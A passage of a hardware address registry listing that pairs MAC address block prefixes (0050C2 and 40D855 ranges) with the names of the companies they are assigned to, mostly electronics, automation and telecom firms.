Inc. 0050C29D1 Bladelius Design Group AB 0050C29CB NIS-time GmbH 0050C29E3 SAI Informationstechnik 0050C29DD Institut Dr. Foerster 0050C29FB Villbau Kft. 0050C29F6 Ion Sense Inc. 0050C2999 Cambustion Ltd 0050C2995 Inter Control Hermann Köhler Elektrik GmbH&Co.KG 0050C2994 Xafax Nederland bv 0050C2991 UGL Limited 0050C2979 Far South Networks (Pty) Ltd 0050C299A Miromico AG 0050C29A7 Thales Communications & Security S.A. 0050C29A5 Conolog Corporation 0050C29AF KRESS-NET Krzysztof Rutecki 0050C29AC Questek Australia Pty Ltd 0050C2982 Triple Ring Technologies, Inc. 0050C29B5 Telegamma srl 0050C2973 Systèmes Pran 0050C294E Zynix Original Sdn. Bhd. 0050C2940 Phitek Systems Ltd. 0050C293F TSB Solutions Inc. 0050C295F METRONIC APARATURA KONTROLNO - POMIAROWA 0050C296D Keene Electronics Ltd. 0050C2952 Tech Fass s.r.o. 0050C295C Resurgent Health & Medical 0050C2958 Sensoptics Ltd 0050C2928 Cinetix GmbH 0050C2925 PHB Eletronica Ltda. 0050C2927 ATIS group s.r.o. 0050C2938 Postec Data Systems Ltd 0050C2939 Mosaic Dynamic Solutions 0050C2937 BigBear 0050C2930 NETA Elektronik AS 0050C292C Exatrol Corporation 0050C2922 Metrum Sweden AB 0050C2923 Amicus Wireless 0050C2921 iQue RFID Technologies BV 0050C291E Automation Tec 0050C291B Embedded Data Systems, LLC 0050C291A Xtone Networks 0050C2916 CHK GridSense P/L 0050C28EF Technologies Sensio Inc 0050C2907 Cristal Controles Ltee 0050C28F7 TGE Co., Ltd. 0050C2905 Link Communications, Inc 0050C28EB C-COM Satellite Systems Inc. 0050C28D0 Saia-Burgess Controls AG 0050C28DD GIMCON 0050C28DB DCOM Network Technology (Pty) Ltd 0050C28FD Sindoma Müh Mim Ýnþ Elk San Tic Ltd. 0050C28FF Luceat 0050C28AC Telsa s.r.l 0050C28A9 Intelligent Security Systems 0050C28A8 ALTEK ELECTRONICS 0050C28AA ATS Elektronik GmbH 0050C28A7 PIXEYE LTD 0050C28A6 SELCO 0050C2883 Neocontrol Soluções em Automação 0050C28CB Beonic Corporation 0050C28CA Altair semiconductor Ltd 0050C28C0 S.C.E. s.r.l. 0050C28C2 Access Control Systems JSC 0050C288C Z-App Systems 0050C288E Cardinal Scale Mfg Co 0050C28B5 Keith & Koep GmbH 0050C289F Datalink Technologies Gateways Inc. 0050C28A2 UAVISION Engenharia de Sistemas 0050C28B0 BK Innovation, Inc. 0050C2895 Marine Communications Limited 0050C2845 VisualSonics Inc. 0050C2843 Xtensor Systems Inc. 0050C283F Phytec Messtechnik GmbH 0050C283C hema electronic GmbH 0050C2849 Design Analysis Associates, Inc. 0050C2865 Persy Control Services B.v. 0050C2861 Grantronics Pty Ltd 0050C2858 Wireless Acquisition LLC 0050C2878 Acoustic Research Laboratories Pty Ltd 0050C286E HANYANG ELECTRIC CP., LTD 0050C286D Tieline Research Pty Ltd 0050C2851 SPJ Embedded Technologies Pvt. Ltd. 0050C2870 LOGEL S.R.L. 0050C2812 Femto SA 0050C280F Selekron Microcontrol s.l. 0050C2828 SLICAN sp. z o.o. 0050C2838 T PROJE MUHENDISLIK DIS. TIC. LTD. STI. 0050C2820 TESCAN, s.r.o. 0050C27E6 Empirix Italy S.p.A. 0050C27EA Monitor Business Machines Ltd. 0050C27CA CEDAR Audio Limited 0050C27F9 Karl DUNGS GmbH & Co. KG 0050C27C2 DSR Information Technologies Ltd. 0050C27E1 Zeltiq Aesthetics, Inc. 0050C2802 Private 0050C27FB Qtron Pty Ltd 0050C27D7 Newtec A/S 0050C2797 Tiefenbach Control Systems GmbH 0050C27B9 Technovare Systems, Inc. 0050C27BB InRay Solutions Ltd. 0050C27A7 Guidance Navigation Limited 0050C27A0 MedAvant Healthcare 0050C279D MiraTrek 0050C279E Benshaw Canada Controls, Inc. 0050C27B2 A.D.I Video technologies 0050C27AD Turun Turvatekniikka Oy 0050C27AB General Microsystems Sdn Bhd 0050C2757 E S P Technologies Ltd 0050C2756 Chesapeake Sciences Corp 0050C2755 Teletek Electronics 0050C2765 Phytec Messtechnik GmbH 0050C2763 XtendWave 0050C2775 Laserdyne Technologies 0050C2786 Keith & Koep GmbH 0050C2781 Starling Advanced Communications 0050C2780 IQ Solutions GmbH & Co. KG 0050C276A Digidrive Audio Limited 0050C2766 Gutermann Technology GmbH 0050C278B OMICRON electronics GmbH 0050C278A LEVEL TELECOM 0050C2789 Rosslare Enterprises Limited 0050C275B DMT System S.p.A. 0050C2773 Pointe Conception Medical Inc. 0050C2738 Miracom Technology Co., Ltd. 0050C2746 Realtronix Company 0050C2744 Avonaco Systems, Inc. 0050C2743 Elektro-Top 3000 Ltd. 0050C2734 CardioMEMS Inc. 0050C272E SNCF EIM PAYS DE LOIRE 0050C2724 HSC-Regelungstechnik GmbH 0050C2725 DSP DESIGN 0050C2752 LOBER, S.A. 0050C2751 e&s Engineering & Software GmbH 0050C2740 McQuay China 0050C26EA FIRSTEC SA 0050C26EB Harrison Audio, LLC 0050C26E5 Boeckeler Instruments, Inc. 0050C26E7 Ace Axis Limited 0050C2703 SAE IT-systems GmbH & Co. KG 0050C2700 GEM-MED SL 0050C26FC Acte Sp. z o.o. 0050C270F Zumbach Electronic AG 0050C270C Exertus 0050C2707 DTech Labs Inc 0050C26EF Pneumopartners LaenneXT SA 0050C26F0 Stanley Security Solutions, Inc. 0050C2719 ennovatis GmbH 0050C2713 3DX-Ray Limited 0050C2704 The Dini Group, La Jolla inc. 0050C2702 SPM Instrument AB 0050C26F4 Cryogenic Control Systems, Inc. 0050C26DC L-3 Communications Mobile-Vision, Inc. 0050C26D8 BL Healthcare, Inc. 0050C26D9 Ajeco Oy 0050C26D4 Etani Electronics Co.,Ltd. 0050C26CA Dynamic Hearing Pty Ltd 0050C26C4 REXXON GmbH 0050C26E3 Miros AS 0050C26E0 FIRSTTRUST Co.,Ltd. 0050C26C3 iTRACS Corporation 0050C26BD Mitron Oy 0050C26C1 RADIUS Sweden AB 0050C26B4 SOMESCA 0050C2696 Casabyte Inc. 0050C269C Bug Labs, Inc. 0050C26A3 CreaTech Electronics Co. 0050C26AA Ifox - Industria e Comercio Ltda 0050C2690 GHL Systems Berhad 0050C268F BERTRONIC SRL 0050C268A Zhuhai Jiahe Electronics Co.,LTD 0050C2679 Industrial Vacuum Systems 0050C267F Phytec Messtechnik GmbH 0050C269B Tsien (UK) Ltd 0050C266B flsystem 0050C265C VTZ d.o.o. 0050C2660 IZISOFT 0050C263E T2 Communication Ltd 0050C2645 The Software Group Limited 0050C2647 R&D Technology Solutionz Limited 0050C2657 MONYTEL S.A. 0050C2668 Keith & Koep GmbH 0050C2663 COE Limited 0050C2652 Wideco Sweden AB 0050C264C CIS Corporation 0050C261A Communication Components Inc. 0050C260C IDENTIC AB 0050C2634 Sohon Inc 0050C2626 Winsys Informatica ltda 0050C2615 Axis Electronics 0050C261F Imagine Communications 0050C25F3 POSNET Polska S.A. 0050C25DF Gnutek Ltd. 0050C25FB All-Systems Electronics Pty Ltd 0050C25F7 Metrologic Group 0050C25D8 TECHNIFOR SAS 0050C25D3 Wexiodisk AB 0050C25EA Micro Elektronische Producten 0050C25E9 Micro Technology Services Inc. 0050C25BF Techimp Systems S.r.l. 0050C25C0 Pyott-Boone Electronics 0050C25A5 Equipos de Telecomunicación Optoelectronicos, S.A. 0050C25A4 Federal State Unitary Enterprise Experimental Factory for Sc 0050C25A8 ETAP NV 0050C25C9 Shenzhen Quanlong Technique Co.Ltd 0050C25B0 INCOTEC GmbH 0050C25AD Emcom Systems 0050C25CF Innomed Medical Inc 0050C25B8 WestfaliaSurge GmbH 0050C25B5 RAFAEL 0050C25D1 Meucci Solutions 0050C2566 ubinetsys.co..ltd 0050C2576 Visi-tech Systems Ltd 0050C2570 Ellex Medical Pty Ltd 0050C2571 Oberon Service srl 0050C25A0 Rudolph Technologies, Inc. 0050C2586 Genetix Ltd 0050C2550 LJU Automatisierungstechnik GmbH 0050C255D ACD Elektronik GmbH 0050C255A Valde Systems, Inc. 0050C2559 Fail Safe Solutions LLC 0050C2545 SecuInfo Co., Ltd. 0050C2548 I.T.W. Betaprint 0050C2536 C2 DIAGNOSTICS 0050C2539 Detection Technology Inc. 0050C2537 DST CONTROL AB 0050C2533 NanShanBridge Co.Ltd 0050C2532 NVE Corporation 0050C2530 Innovation, Institute, Inc 0050C2557 Netcomsec Co Ltd 0050C2540 Mesure Controle Commande 0050C2523 AMRDEC Prototype Integration Facility 0050C251F Traquair Data Systems, Inc. 0050C251E Alcon Technologies 0050C2517 Solid State Logic 0050C2514 Tadian Electronics Systems LTD 0050C2513 Genie Network Resource Management Inc. 0050C2510 Summit Developmen 0050C251A SpeasTech, Inc. 0050C2524 Motec Pty Ltd 0050C2506 7+ Kft 0050C24FC Hwayoung RF Solution Inc 0050C24DF Thermo Electron 0050C24E0 Telematrix 0050C24F2 Tantronic AG 0050C24C8 Neets 0050C24D8 Avantry Ltd. 0050C24E1 SS Telecoms CC 0050C2497 Advanced Driver Information Technology GmbH 0050C2495 VAZA Elektronik AB 0050C2490 Cloanto Corporation 0050C24A8 CYJAYA Korea 0050C24A6 BUYANG ELECTRONICS INDUSTRIAL CO., LTD. 0050C24AA HEINEN ELEKTRONIK GmbH 0050C24BC Saia Burgess Controls AG 0050C2496 Acutelogic Corporation 0050C246D Paul Scherrer Institut (PSI) 0050C246B EASYTECH GmbH 0050C245E Halliburton - Sperry Drilling Service 0050C2460 Vitelnet 0050C2461 TATTILE SRL 0050C245F T2C Marketing AB 0050C247B Pitney Bowes, Inc 0050C2488 DA SISTEMI SPA 0050C2487 Eridon Corporation 0050C2480 SELKOM GmbH 0050C2470 Cybectec inc. 0050C242A DSP DESIGN 0050C244B Solace Systems, Inc. 0050C2448 Comtech Systems Inc. 0050C2446 Micro Technic A-S 0050C243E Coppercom 0050C2439 Peleton Photonic Systems 0050C2434 ImperativeNetworks 0050C2419 Mecsel Oy 0050C241B LogiM GmbH Software und Entwicklung 0050C2418 Planea Oy 0050C2412 TSB Solutions Inc. 0050C240E ads-tec GmbH 0050C2409 KTEC LTD 0050C23D0 Micro-Robotics Limited 0050C23F9 Sintium Ltd 0050C23F5 Phaedrus Limited 0050C23EB ISS International 0050C23E8 Conformative Systems, Inc. 0050C23D3 American LED-gible Inc. 0050C23CD Micro-Measurements 0050C23C3 4g Technologies, L.P. 0050C23C9 Dilax Intelcom AG 0050C23C6 Net Optics 0050C23B9 Gilbarco Autotank AB 0050C23B3 Media Lab., Inc. 0050C23A6 IntelliDesign Pty Ltd 0050C2363 Septentrio nv/sa 0050C235E Jobin Yvon,Inc 0050C235F F.Imm. S.r.L. 0050C235B VLSIP TECHNOLOGIES, INC 0050C2389 Exavio Inc. 0050C2381 Realtime Engineering AG 0050C236E Minicom Advanced Systems Ltd 0050C2386 Precision System Science Co.,Ltd 0050C233C SkipJam 0050C2338 Ernitec A/S 0050C232B Digital Multimedia Technologies Spa 0050C2326 Navionics S.p.A. 0050C2329 Imax 0050C2345 ACT 0050C2346 biokeysystem 0050C2344 ads-tec GmbH 0050C2342 St. Michael Strategies 0050C2321 UXP 0050C2351 Finesystem Co., Ltd 0050C2333 Radix Corporation 0050C230F Digicontrole Lda 0050C230D SETARAM 0050C2310 CYBERTRON CO., LTD. 0050C2309 Rackmaster Systems, Inc. 0050C2307 UNIONDIGITAL.,CO.LTD 0050C2304 COMERSON S.r.l. 0050C22F8 SavvyCorp.com Ltd 0050C22F1 Geometrics, Inc. 0050C22FB Arthur Industries Inc., dba On Hold Media Group 0050C22D8 SYN-TECH SYSTEMS INC 0050C22D4 Integrated System Solution Corp. 0050C22CE Ross Video Limited 0050C22BA NORCO INDUSTRIAL TECHNOLOGY INC 0050C22A7 Micro System Architecturing srl 0050C22AA DEUTA Werke GmbH 0050C22AE Quest Retail Technology Pty Ltd 0050C22D3 Gerber Scientific Products, Inc. 0050C22C2 Smarteye Corporation 0050C22BE Lipowsky Industrie-Elektronik GmbH 0050C22BB TA Instruments Ltd 0050C227B LinkSecurity A/S 0050C228A Real Time Systems 0050C2288 RPM Systems Corporation 0050C228B Orion Technologies,LLC 0050C227E AnaLogic Computers Ltd. 0050C2277 T/R Systems, Inc. 0050C229D Globe Wireless 0050C229E SELEX Communications Ltd 0050C229F Baudisch Electronic GmbH 0050C2298 Harvad University 0050C2295 LOGOSOL, INC. 0050C22A3 West-Com Nurse Call Systems, Inc. 0050C2293 IP Unity 0050C2291 CHAUVIN ARNOUX 0050C226A FG SYNERYS 0050C226B Continental Gateway Limited 0050C2268 Parabit Systems 0050C2266 ATOM GIKEN Co.,Ltd. 0050C2263 Vansco Electronics Oy 0050C2248 Dixtal Biomedica Ind. Com. Ltda. 0050C2244 intec GmbH 0050C2249 Bender GmbH & Co. KG 0050C225C Softhill Technologies Ltd. 0050C225D RDTECH 0050C2259 Omicron Ceti AB 0050C2257 Digicast Networks 0050C2252 ads-tec GmbH 0050C2250 ACD Elektronik GmbH 0050C225E MITE Hradec Kralove, s.r.o. 0050C225B Winford Engineering 0050C223F Halliburton - NUMAR 0050C2219 Aeroflex GmbH 0050C2226 Ross Video Limited 0050C222F HTEC Limited 0050C2237 Tandata Systems Ltd 0050C2234 Silverback Systems 0050C223A Chantry Networks 0050C223D Gauging Systems Inc 0050C222C Intrinsity 0050C2223 visicontrol GmbH 0050C2205 SystIng 0050C2203 Vocality International Ltd 0050C2211 Hochschule für Technik, Wirtschaft und Kultur Leipzig (FH) 0050C220B Rafael 0050C2207 Solectron Ind.Com.Servs.Exportadora do Brasil Ltda. 0050C21F1 SKY Computers, Inc. 0050C2202 Audio Riders Oy 0050C21E9 Ranch Networks 0050C21D6 shanghai trend intelligent systems CO.,LTD 0050C21B9 EmCom Technology Inc. 0050C21B7 MosChip USA 0050C21BB Email Metering 0050C21CB quantumBEAM Limited 0050C21DF Lulea University of Technology 0050C21AE Home Director, Inc 0050C21B0 BLANKOM Antennentechnik GmbH 0050C21A7 Alpha Beta Technologies, Inc. 0050C21AA BitBox Ltd 0050C21AD Remia s.r.o. 0050C219C Artec Design 0050C21A5 NORCO 0050C21A0 SCA Data Systems 0050C218E SPARR ELECTRONICS LTD 0050C2191 Partner Voxstream A/S 0050C218D CCII Systems (Pty) Ltd 0050C2157 nCore, Inc. 0050C2158 Communication Solutions, Inc. 0050C2155 Enea Real Time AB 0050C2137 Uniwell Systems (UK) Ltd. 0050C20F6 Carl Baasel Lasertechnik GmbH 0050C214E Corinex Global 0050C2017 Hunter Technology Inc. 0050C200D Opus Telecom Inc. 0050C216D Postec Data Systems Ltd. 0050C2064 Private 0050C216E PMC 0050C2062 Private 0050C2150 Torse 0050C2148 Alltec GmbH 0050C2136 Tensilica, Inc. 0050C211D Destiny Networks, Inc. 0050C2121 COE Limited 0050C2128 Pycon, Inc. 0050C2126 MaxLinear Hispania S.L.U. 0050C2124 Tokai Soft Corporation 0050C2112 Compuworx 0050C2075 ENTTEC Pty Ltd. 0050C2111 Endusis Limited 0050C210A Quinx AG 0050C211E Volvo Car Corporation 0050C20F5 Spectra Technologies Holding Co., Ltd. 0050C2106 MATSUOKA 0050C2102 Million Tech Development Ltd. 0050C20EB iREZ Technologies LLC 0050C20DB Cyberex 0050C20D5 Zelax 0050C20D2 Real World Computing Partnership 0050C20DF Innovation Institute, Inc. 0050C20D9 Loewe Opta GmbH 0050C20E4 Collabo Tec. Co., Ltd. 0050C20C2 Alchemy Semiconductor, Inc. 0050C209C RF Applications, Inc. 0050C20CA J D Richards 0050C20CC AlphaMedia Co., Ltd 0050C20BE Stella Electronics & Tagging 0050C20B6 ApSecure Technologies (Canada), Inc. 0050C20CF PCSC 0050C20A7 WaterCove Networks 0050C20AD BMC Messsysteme GmbH 0050C2099 Case Information & Communications 0050C209F MetaWave Vedeo Systems 0050C209A NBO Development Center Sekusui Chemical Co. Ltd. 0050C2082 GFI Chrono Time 0050C2088 TELINC Corporation 0050C2070 Katchall Technologies Group 0050C206F Digital Services Group 0050C206E Avtron Manufacturing Inc. 0050C2068 Seabridge 0050C2069 EC Elettronica S.R.L. 0050C206B NCast Corporation 0050C207B Trikon Technologies Ltd. 0050C2056 Base 2 0050C2055 San Castle Technologies, Inc. 0050C205A Sonifex Ltd 0050C205F Malden Electronics Ltd 0050C2057 Lite F GmBH 0050C203D ISDN Gateway Technology AG 0050C203A PLLB Elettronica SPA 0050C2048 Cybectec Inc. 0050C204E Industrial Electronic Engineers, Inc. 0050C2027 Industrial Control Links 0050C2028 The Frensch Corporation (Pty) Ltd. 0050C202F Sinetica Corp 0050C201D Princeton Gamma Tech 0050C200F XLN-t 0050C2B5B Timberline Manufacturing 40D855194 RF Code 0050C23F3 Hitachi Energy Germany AG 0050C2F12 General Industrial Controls Pvt Ltd 0050C26C2 HoseoTelnet Inc... 0050C29CD Uwe Schneider GmbH 0050C2B58 RealD, Inc. 0050C29BB OMICRON electronics GmbH 0050C2BFB ECS Srl 0050C2398 Inhand Electronics, Inc. 0050C2054 Optionexist Limited 0050C281F 2N TELEKOMUNIKACE a.s. 0050C2E7C sp controls, inc 40D85506A elgris UG 0050C20FC Kimmon Manufacturing Co., Ltd. 0050C2A82 CT Company 0050C2EA9 Mettler Toledo 0050C227D ALLIED TELESIS K.K. 40D855054 VITEC 0050C2DA4 DEUTA-WERKE GmbH 0050C2E44 DEUTA-WERKE GmbH 0050C27FA AutomationX GmbH 0050C2D9A Saia-Burgess Controls AG 0050C2025 TERACOM TELEMATICA S.A 0050C2761 Elbit Systems of America 40D8551DF Chengdu Meihuan Technology Co., Ltd 0050C2B0B Honeywell 0050C2F55 Honeywell 0050C23EA Alro Information Systems SA 40D8550FF YUYAMA MFG Co.,Ltd 0050C2EEC YUYAMA MFG Co.,Ltd 0050C2452 Scame Sistemi srl 40D855165 TECHBOARD SRL 0050C21DC Imarda New Zealand Limited 0050C2926 DiTEST Fahrzeugdiagnose GmbH 0050C208B HYPERCHIP Inc. 0050C2B2C Concepteers, LLC 0050C2945 Exi Flow Measurement Ltd 40D8550C9 QUANTAFLOW 0050C2F63 Triax A/S 0050C25A7 Phytec Messtechnik GmbH 40D8550CD Logical Product 0050C2C35 Insitu, Inc 0050C20C4 InterEpoch Technology,INC. 0050C2FC6 Critical Link LLC 0050C24F0 MedAvant Healthcare 40D855044 An Chen Computer Co., Ltd. 0050C2301 Delphi Display Systems, Inc. 0050C2578 Delphi Display Systems, Inc. 0050C22BF PERAX 40D8551BD HORIBA ABX SAS 0050C2EF9 HORIBA ABX SAS 0050C2CF5 Gogo BA 0050C25AF DORLET SAU 0050C21E5 DORLET SAU 0050C2EE2 System Industrie Electronic GmbH 0050C273B On Air Networks 0050C2B48 MTD GmbH 0050C2374 Owasys Advanced Wireless Devices 0050C26FA DCNS 0050C21EA DAVE SRL 0050C21B3 DSP DESIGN 0050C2AFB Vocality International Ltd 0050C2EE4 Rohde&Schwarz Topex SA 40D85519A Rohde&Schwarz Topex SA 40D8550B7 ACD Elektronik GmbH 0050C29D3 Telemetrie Elektronik GmbH 0050C29EC Rohde&Schwarz Topex SA 0050C2C9E Rohde&Schwarz Topex SA 0050C2DD3 Rohde&Schwarz Topex SA 0050C2855 Rohde&Schwarz Topex SA 0050C2E2A Rohde&Schwarz Topex SA 0050C20F8 Tecnint HTE SRL 0050C27F4 Wireless Cables Inc. 0050C2DAC RFL Electronics, Inc. 0050C2C90 RealD, Inc. 0050C22B7 RAFI GmbH & Co.KG 40D8550BC Aplex Technology Inc. 40D855060 Aplex Technology Inc. 0050C2F08 Aplex Technology Inc. 0050C2F26 WaveIP 0050C2553 ATH system 0050C23CC Linkwell Telesystems Pvt Ltd 0050C2FD5 American Microsystems, Ltd. 0050C27E9 Sicon srl 0050C2A92 Sicon srl 0050C2CE2 Sicon srl 0050C2E0A Sicon srl 0050C27A8 Integrated Design Tools, Inc. 0050C2107 NewHer Systems 40D85502F Advatek Lighting Pty Ltd 0050C2380 EKE-Electronics Ltd. 0050C2527 IRTrans GmbH 0050C28A1 Intune Networks 0050C2A06 CLOOS ELECTRONIC GMBH 40D8550F1 Grossenbacher Systeme AG 0050C24F3 Autronica Fire And Securirty 0050C2CFA Grupo Epelsa S.L. 0050C2A24 Grupo Epelsa S.L. 0050C2BF0 AIM 0050C2F58 IEEE Registration Authority 0050C2DD6 Wartsila Voyage Limited 0050C29F0 Veracity UK Ltd 40D8551DB NIPPON TECHNO LAB.,INC, 40D8551D5 FST21 Ltd. 40D8551D8 Owl Cyber Defense Solutions, LLC 40D8551CB MG S.r.l. 40D8551B7 TEWS Elektronik GmbH & Co. KG 40D8551B8 Orion Systems, Inc 40D8551BC KbDevice,Inc. 40D8551B4 Inforce Computing Inc. 40D8551A3 Noritake Itron Corporation 40D8551A2 HIPODROMO DE AGUA CALIENTE, S.A. DE C.V. 40D8551A4 cibite AG 40D855193 FORZA SILICON CORP. 40D855190 Spider Tecnologia Ind. e Com Ltda 40D85518E Kerun Visual Technology Co., Ltd.(Shenzhen) 40D855184 Satkirit Ltd 40D855186 KST technology 40D85516D GD Mission Systems 40D85515B SQF Spezialelektronik GmbH 40D85515C Spectratech Inc. 40D85516B TECHWAY 40D85517B LUCEO 40D855172 YAWATA ELECTRIC INDUSTRIAL CO.,LTD. 40D855162 LUNA-NEXUS 40D855175 AHB Systeme GmbH 40D855179 Servo-Robot Inc. 40D855135 GLOBALCOM ENGINEERING SRL 40D855154 iart 40D855152 Home Automation Europe 40D85514E Marposs S.p.A 40D855148 SEIKO TIME SYSTEMS INC. 40D85512C NSP Europe Ltd 40D855141 Key Systems, Inc. 40D855140 InnoTrans Communications, Inc 40D855103 Peek Traffic Corporation 40D855104 IMPLE SISTEMAS ELETRONICOS EMBARCADOS LTDA 40D855128 Akse srl 40D855122 ATX Networks Ltd. 40D855129 DSP DESIGN 40D8550F5 CST Group 40D855112 Halliburton - Sperry Drilling Service 40D85511B nanoTRONIC GmbH 40D855116 Uniscan LLC 40D855119 OOO Group of Industrial Technologies 40D855108 ALPHA DESIGN CO.,LTD. 40D855109 Rosslare Enterprises Limited 40D8550E6 Kyoritsu Electric Corp. 40D8550E3 Medigus Ltd 40D8550E4 ARAGO SYSTEMS 40D8550E2 Keocko Holding Kft. 40D8550E1 STV Electronic GmbH 40D8550D9 YUKO ELECTRIC CO.,LTD 40D8550F3 ECON Systems Inc. 40D8550EF GeneSys Elektronik GmbH 40D8550EB WANTECH Networks 40D8550E9 HAMEG GmbH 40D8550A1 ADVALY SYSTEM Inc. 40D85509E NanoPulse, Inc. 40D85509F Bascules Robbe nv 40D8550C7 insensiv GmbH 40D8550C0 ACT 40D855096 Comtel Electronics GmbH 40D8550BF Shenzhen SETEC Power Co.,Ltd 40D8550BA PCH Engineering A/S 40D8550A7 First Design System Inc. 40D8550B4 MITSUBISHI ELECTRIC SYSTEM & SERVICE CO.,LTD. 40D8550B3 T.W.S. srl 40D8550B1 Nanjing TIANSU Automation Control System Co., Ltd. 40D8550A3 Telefrank GmbH 40D85508C Magnescale Co.,Ltd 40D85508B MeshWorks Wireless Oy 40D855086 DSP DESIGN 40D855079 DelfiSolutions A/S 40D855066 TeraTron GmbH 40D855081 Sicon srl 40D85507F Wheatstone Corporation 40D855067 Tronic Control ltd. 40D855075 Teraflops 40D85505F EPSa GmbH 40D855036 Schweers informationstechnologie GmbH 40D855043 SchulerControl GmbH 40D855062 Tech Source Inc 0050C2FFF MSR-Solutions GmbH 40D855000 XRONOS.INC 40D855001 Vemotion 0050C2FFD Touchless Biometric Systems AG 0050C2FFC Spirent Communications 40D855022 Digimerge Technology Inc 40D85501E A2S 40D85501C BERG Cloud Limited 40D855017 Franke Aquarotter GmbH 40D855012 Sencon Inc. 40D85502B Nomatronics 40D85502C InventLab s.c. 40D855023 Shanghai o-solution electronics & Technology Co., Ltd. 40D85502D Elgama Sistemos 0050C2FDD Toptech Systems, Inc. 0050C2FEE Sparks Instruments SA 0050C2FEB Axible Technologies 0050C2FCC Soudronic AG 0050C2FE5 Scandinova Systems AB 0050C2FC3 HSDC Sp. z o.o. 0050C2FB1 MATELEX 0050C2FA6 Hilkom digital GmbH 0050C2FA1 N-Hands GmbH und Co KG 0050C2FAC ADETEL GROUP 0050C2F70 Noralta Technologies Inc 0050C2F8E GPO 0050C2F8A EMAC, Inc. 0050C2F91 RE2 Inc 0050C2F72 MaxDeTec AG 0050C2F6A OFI Inc. (dba 2D2C) 0050C2F76 Rong Jie(FuZhou)Electronics Co.,Ltd 0050C2F59 G3 Technologies 0050C2F57 Reach Technologies Inc. 0050C2F3A Saia-Burgess Controls AG 0050C2F3B TAMS firmware co. 0050C2F45 HUSTY M.Styczen J.Hupert Sp.J. 0050C2F4C Enistic Limited 0050C2F1B Saia-Burgess Controls AG 0050C2F19 Netlink Bilisim Sistemleri San. ve Tic. Ltd. Sti. 0050C2F27 ELAN SYSTEMS 0050C2F04 KINKI ROENTGEN INDUSTRIAL CO.,LTD 0050C2F02 BMR 0050C2F13 Packet Plus, Inc. 0050C2F0C SKYCHANNEL LTD 0050C2F1F Verified Energy, LLC. 0050C2F29 RADYNE CORPORATION 0050C2EC7 LIQUID ROBOTICS, INC 0050C2EDE Smart Grid Networks 0050C2EE6 B:TECH, a. s. 0050C2EE7 syes srl 0050C2ED8 AVocation Systems, Inc. 0050C2EEA Positioneering Limited 0050C2EE8 Kamacho Scale Co., Ltd. 0050C2ED0 Nippon Systemware Co.,Ltd. 0050C2ECB FAL Corp 0050C2EF3 Smart Power Electronics GmbH & Co. KG 0050C2E9E American Microsystems, Ltd. 0050C2EBC Diehl AKO Stiftung & Co. KG 0050C2EBB TimeTerminal Adductor Group AB 0050C2EB9 ALPHA-MOS 0050C2EA3 Subsea Systems, Inc. 0050C2EC5 RSUPPORT Co., Ltd. 0050C2E9B Hentschel System GmbH 0050C2E94 ANA-U GmbH 0050C2EB6 Monsoon Solutions, Inc. 0050C2E57 EOLANE MONTCEAU 0050C2E56 RFENGINE CO., LTD. 0050C2E6C SAMSUNG Electronics Co.,Ltd.(LED Division) 0050C2E51 Motec Pty Ltd 0050C2E76 Embedded Solution Bank Co., Ltd. 0050C2E85 Cosmo Life Co.,Ltd 0050C2E75 FSM AG 0050C2E7B ATOM GIKEN Co.,Ltd. 0050C2E43 Technica Engineering GmbH 0050C2E3F VISITO S.R.L. 0050C2E3E Monnit Corp. 0050C2E41 Higeco S.r.l. 0050C2E4F Wine Technology Marlborough 0050C2E50 Tattile srl 0050C2E2D Funkwerk IT Karlsfeld GmbH 0050C2E2B Plant Integrity Limited 0050C2E29 Fr. Sauter AG 0050C2E07 Protagon Process Technologies GmbH 0050C2E25 ACD Elektronik GmbH 0050C2E1B Embedded Labs 0050C2DFB BETTINI SRL 0050C2DF9 Jenny Science AG 0050C2DFA MAC Valves, Inc. 0050C2DF1 Saia-Burgess Controls AG 0050C2DD5 Friend Spring Industrial Co., Ltd. 0050C2DE3 Breakaway Systems LLC 0050C2DE7 Elan Systems 0050C2DE8 Visual Productions 0050C2DCD dilitronics GmbH 0050C2DC1 Acrux Technology Limited 0050C2DBA M.P. Electronics 0050C2DEA Cerner Corporation 0050C2DA1 MangoDSP 0050C2D9D Mistral Solutions Pvt. Ltd 0050C2D86 ECOMM ERA 0050C2DB5 DSP DESIGN LTD 0050C2D96 CONTEC GmbH 0050C2DAD Keith & Koep GmbH 0050C2D8F Syes srl 0050C2D8A OptoLink Industria e Comercio Ltda 0050C2D67 KLING & FREITAG GmbH 0050C2D42 Hagenuk KMT GmbH 0050C2D58 NIK-ELEKTRONIKA Ltd 0050C2D4D Yardney Technical Products Inc. 0050C2D46 Thales Nederland BV 0050C2D79 DSI RF Systems, Inc. 0050C2CFF Infrasafe, Inc. 0050C2CFE Techleader 0050C2D21 Innovative Circuit Technology 0050C2D1E Tobila Systems, Inc. 0050C2D06 nCk Research LLC 0050C2D01 Aanderaa Data Instruments 0050C2D2B Video Tech Laboratories, Inc. 0050C2D2C Schneider Electric Motion USA 0050C2D28 Digitale Analoge COMponenten West Electronic Vertriebs GmbH 0050C2D35 UG Systems GmbH & Co. KG 0050C2D31 UNGAVA Technologies Inc. 0050C2CD6 Arktan Systems 0050C2CE3 Industrial Automatics Design Bureau 0050C2CDF CoreEL TEchnologies (I) Pvt Ltd 0050C2CB4 GEA Farm Technologies GmbH 0050C2CCE Mac-Gray Corporation 0050C2CD1 ACD Elektronik GmbH 0050C2CC9 Promess GmbH 0050C2CC0 World Time Solutions Limited 0050C2CB8 Raith GmbH 0050C2CB6 Krontek Pty Ltd 0050C2CBE CODE BLUE CORPORATION 0050C2CF0 Inviso B.V. 0050C2CA8 Systems With Intelligence Inc. 0050C2C7E Buerkert Werke GmbH 0050C2C7A Protonic Holland 0050C2C9A PACOMP Sp. z o.o. 0050C2C95 IPSES S.r.l. 0050C2C8B OCAS AS 0050C2C8C Lanmark Controls Inc. 0050C2C53 Eilersen Electric A/S 0050C2C50 Beceem Communications, Inc. 0050C2C4E Elaso AG 0050C2C51 InForce Computing, Inc. 0050C2C4C Lancier Monitoring GmbH 0050C2C65 Micro I/O Servicos de Electronica, Lda 0050C2C66 KS Beschallungstechnik GmbH 0050C2C60 Integration Technologies Limited 0050C2C2D Digitale Analoge COMponenten West Electronic Vertriebs GmbH 0050C2C29 Newtel Engineering S.r.l. 0050C2C42 Saia-Burgess Controls AG 0050C2C37 B.E.A.R. Solutions (Australasia) Pty, Ltd 0050C2C4A Herrick Technology Laboratories, Inc. 0050C2C4B R.V.R. elettronica s.p.a. 0050C2C73 Industry Controls, Inc. 0050C2C58 Foerster-Technik GmbH 0050C2C36 SET GmbH 0050C2C2E DISMUNTEL SAL 